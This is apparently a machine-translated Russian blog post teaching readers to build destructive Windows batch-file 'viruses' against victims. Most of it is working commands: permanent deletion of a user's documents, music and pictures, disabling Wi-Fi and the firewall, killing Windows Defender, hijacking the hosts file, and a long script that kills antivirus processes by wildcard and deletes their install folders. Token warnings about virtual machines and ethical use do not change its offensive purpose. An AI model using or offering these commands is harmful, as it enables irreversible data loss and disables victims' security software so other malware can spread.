Join
Hazy
@hazy
March 28, 2020

Пилим вирусы

К настоящему времени вы должны иметь довольно хорошее представление о работе с пакетными файлами . Пришло время для тебя вылететь из гнезда. Ниже представлены несколько идей для вещей, которые вы можете сделать ваши вирусы делать.

Эти команды должны работать на большинстве систем Windows 10 с конфигурацией по умолчанию. Однако вам может потребоваться настроить некоторые из них, прежде чем они будут работать на вас. Например, чтобы убить антивирус вашей жертвы, вам нужно будет знать, какой антивирус у них есть в первую очередь, только тогда вы можете остановить его процесс и удалить его.

Предупреждение: выполнение некоторых из этих команд приведет к постоянной потере данных. Если вы хотите попробовать их, сделайте это в виртуальной машине .

Удалить важные вещи

Повреждение персональных данных является чисто деструктивным мотивом атаки. Нападающий ничего не получает, но жертва что-то теряет. К лучшему или худшему, это то, что пакетные файлы действительно сияют. Пакетные файлы могут спокойно удалять огромное количество данных, и жертва никогда не поймет, что происходит, пока не станет слишком поздно. А использование delкоманды означает, что данные не попадают в корзину, а удаляются безвозвратно.

Что еще страшнее, так это то, что большинство каталогов, включая приведенные ниже примеры, по умолчанию не требуют прав администратора для доступа. Однако, если вы можете запустить пакетный файл от имени администратора, то это открывает всю систему для атаки (например, удаление антивирусов, чтобы позволить другим вредоносным программам свободно перемещаться).

Удаление документов

del /f /q "%userprofile%\Documents\*.*"

Удалить музыку

del /f /q "%userprofile%\Music\*.*"

Удаление картинок

del /f /q "%userprofile%\Pictures\*.*"

Отключить важные вещи

Тот факт, что windows предоставляет утилиты и службы, которые могут быть доступны через командную строку, открывает еще один вектор атаки. Изменение важных конфигураций, таких как записи реестра, может сделать компьютер непригодным для использования.

Отключить Wi-Fi - давайте посмотрим, как мы можем пойти на это. Сначала мы узнаем названия всех сетевых интерфейсов:

netsh interface show interface
  • Этот выход:
Admin State    State          Type             Interface Name
-------------------------------------------------------------------------
Enabled        Disconnected   Dedicated        Ethernet
Enabled        Connected      Dedicated        VirtualBox Host-Only Network
Enabled        Connected      Dedicated        Ethernet 2
Enabled        Connected      Dedicated        Wi-Fi

Для моего компьютера беспроводной интерфейс просто назван Wi-Fi(он может отличаться для вас). И теперь мы можем просто отключить его:

netsh interface set interface "Wi-Fi" Disable

И Wi-Fi перестает работать, а также значок Wi-Fi исчезает с панели задач.

Он может быть повторно включен с помощью этой команды: (P. S: отключение/включение интерфейсов требует прав администратора.)

netsh interface set interface "Wi-Fi" Enable
  • Или через Панель управления:
Настройки WiFi, показывающие hwo к

Отключить брандмауэр

net stop "MpsSvc"

Остановить Защитник Windows

taskkill /f /t /im "MSASCuiL.exe"
taskkill /f /t /im "MSASCui.exe"

Блокировать Сайты

Мы можем заблокировать любой сайт, который мы хотим, отредактировав hosts файл:

cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "hosts"
echo 127.0.0.1 www.google.com >> "hosts"

127.0.0.1 это localhost. Приведенная выше команда сообщает компьютеру, что он собирается найти google.comна своем собственном устройстве. Поэтому браузер даже не пытается узнать реальный IP-адрес google.com, он просто использует localhost, где, конечно, он не получает ответа. Обычно вы хотите заблокировать как домен верхнего уровня www., так и поддомен.

Это довольно дерьмовая вещь, чтобы сделать с кем-то, не так ли? Может быть, вы должны быть белой шляпой и сделать "вирус", что блокирует навязчивую рекламу и помогите защитить частную жизнь вашей жертвы.

Удалить все антивирусы

Следующий фрагмент кода пытается отключить и удалить все распространенные антивирусы. Это действительно просто приветствие Марии и определенно не самый подходящий способ для этого. Вам понадобятся права администратора, чтобы запустить это. Ниже вы увидите два типа команд:

  • taskkill: Эти команды пытаются убить запущенные антивирусные процессы. Ниже приводится ряд общих имен процессов. Обратите внимание, что мы используем подстановочный *знак в именах. Это означает, например, av*что будут включены все имена, начинающиеся с ‘av'. Так что вполне возможно, что целый ряд невинных процессов также попадет под перекрестный огонь.
  • RMDIR: Эти команды просто удаляют папки установки по умолчанию антивирусов.
taskkill /F /IM av* >NUL
taskkill /F /IM fire* >NUL
taskkill /F /IM anti* >NUL
taskkill /F /IM spy* >NUL
taskkill /F /IM bullguard* >NUL
taskkill /F /IM PersFw* >NUL
taskkill /F /IM KAV* >NUL
taskkill /F /IM ZONEALARM* >NUL
taskkill /F /IM SAFEWEB* >NUL
taskkill /F /IM OUTPOST* >NUL
taskkill /F /IM nv* >NUL
taskkill /F /IM nav* >NUL
taskkill /F /IM F-* >NUL
taskkill /F /IM ESAFE* >NUL
taskkill /F /IM cle* >NUL
taskkill /F /IM BLACKICE* >NUL
taskkill /F /IM def* >NUL
taskkill /F /IM kav* >NUL
taskkill /F /IM kav* >NUL
taskkill /F /IM avg* >NUL
taskkill /F /IM ash* >NUL
taskkill /F /IM aswupdsv* >NUL
taskkill /F /IM ewid* >NUL
taskkill /F /IM guar* >NUL
taskkill /F /IM gcasDt* >NUL
taskkill /F /IM msmp* >NUL
taskkill /F /IM mcafe* >NUL
taskkill /F /IM mghtml* >NUL
taskkill /F /IM msiexec* >NUL
taskkill /F /IM outpost* >NUL
taskkill /F /IM isafe* >NUL
taskkill /F /IM zap* >NUL
taskkill /F /IM zauinst* >NUL
taskkill /F /IM upd* >NUL
taskkill /F /IM zlclien* >NUL
taskkill /F /IM minilog* >NUL
taskkill /F /IM norton* >NUL
taskkill /F /IM ccc* >NUL
taskkill /F /IM npfmn* >NUL
taskkill /F /IM loge* >NUL
taskkill /F /IM nisum* >NUL
taskkill /F /IM issvc* >NUL
taskkill /F /IM tmp* >NUL
taskkill /F /IM tmn* >NUL
taskkill /F /IM pcc* >NUL
taskkill /F /IM cpd* >NUL
taskkill /F /IM pop* >NUL
taskkill /F /IM pav* >NUL
taskkill /F /IM padmin* >NUL
taskkill /F /IM panda* >NUL
taskkill /F /IM avsch* >NUL
taskkill /F /IM sche* >NUL
taskkill /F /IM syman* >NUL
taskkill /F /IM virus* >NUL
taskkill /F /IM realm* >NUL
taskkill /F /IM sweep* >NUL
taskkill /F /IM scan* >NUL
taskkill /F /IM ad-* >NUL
taskkill /F /IM safe* >NUL
taskkill /F /IM avas* >NUL
taskkill /F /IM norm* >NUL
taskkill /F /IM offg* >NUL
RMDIR /Q "C:\Program Files\alwils~1" /S >NUL
RMDIR /Q "C:\Program Files\Lavasoft\Ad-awa~1" /S >NUL
RMDIR /Q "C:\Program Files\kasper~1" /S >NUL
RMDIR /Q "C:\Program Files\trojan~1" /S >NUL
RMDIR /Q "C:\Program Files\f-prot95" /S >NUL
RMDIR /Q "C:\Program Files\tbav" /S >NUL
RMDIR /Q "C:\Program Files\avpersonal" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\Mcafee" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\Norton~3" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1\speedd~1" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\Norton~1" /S >NUL
RMDIR /Q "C:\Program Files\avgamsr" /S >NUL
RMDIR /Q "C:\Program Files\avgamsvr" /S >NUL
RMDIR /Q "C:\Program Files\avgemc" /S >NUL
RMDIR /Q "C:\Program Files\avgcc" /S >NUL
RMDIR /Q "C:\Program Files\avgupsvc" /S >NUL
RMDIR /Q "C:\Program Files\grisoft" /S >NUL
RMDIR /Q "C:\Program Files\nood32krn" /S >NUL
RMDIR /Q "C:\Program Files\nood32" /S >NUL
RMDIR /Q "C:\Program Files\nod32" /S >NUL
RMDIR /Q "C:\Program Files\nood32" /S >NUL
RMDIR /Q "C:\Program Files\kav" /S >NUL
RMDIR /Q "C:\Program Files\kavmm" /S >NUL
RMDIR /Q "C:\Program Files\kaspersky" /S >NUL
RMDIR /Q "C:\Program Files\ewidoctrl" /S >NUL
RMDIR /Q "C:\Program Files\guard" /S >NUL
RMDIR /Q "C:\Program Files\ewido" /S >NUL
RMDIR /Q "C:\Program Files\pavprsrv" /S >NUL
RMDIR /Q "C:\Program Files\pavprot" /S >NUL
RMDIR /Q "C:\Program Files\avengine" /S >NUL
RMDIR /Q "C:\Program Files\apvxdwin" /S >NUL
RMDIR /Q "C:\Program Files\webproxy" /S >NUL
RMDIR /Q "C:\Program Files\panda software" /S >NUL

Наше путешествие только началось, поэтому мы должны продолжать двигаться. Само собой разумеется, что вы должны использовать это знание этически. Сегодняшние системы в значительной степени защищены от небольших пакетных файловых вирусов, но скоро мы узнаем о методах взлома, которые могут быть использованы, чтобы действительно повредить людям и предприятиям, финансово или иным образом. И с этим мы прощаемся с пакетными файловыми вирусами.

Hazy
March 28, 2020, 16:58
0 views
0 reactions